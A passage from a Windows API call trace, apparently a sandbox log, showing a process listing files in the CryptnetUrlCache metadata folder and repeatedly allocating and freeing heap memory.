hHeap=0x620000) returned 1 [0203.728] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xab8c1ed0, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xab8c1ed0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xbef32960, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0203.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.728] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37C951188967C8EB88D99893D9D191FE") returned="" [0203.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.729] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1aa3080, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x1aa3080, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacf78620, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0203.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.729] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0203.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.729] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x794f7e10, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x794f7e10, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacf524c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0203.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.730] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0203.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.730] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7c71ad70, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7c71ad70, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x7c71ad70, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.731] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0203.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.731] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4eb51c0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x4eb51c0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x2948f970, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x148, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0203.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.732] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0203.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.732] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4e42da0, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0203.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.733] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0203.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.733] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x130, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0203.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.733] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0203.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.734] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xaeb57250, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xaeb57250, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xbef32960, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0203.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.734] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C0018BB1B5834735BFA60CD063B31956") returned="" [0203.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.734] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f93dcd0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f93dcd0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0203.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.735] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0203.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.735] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f93dcd0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f93dcd0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0203.735] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0203.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0203.737] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0203.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0203.737] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0203.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0203.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0203.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.765] HeapFree 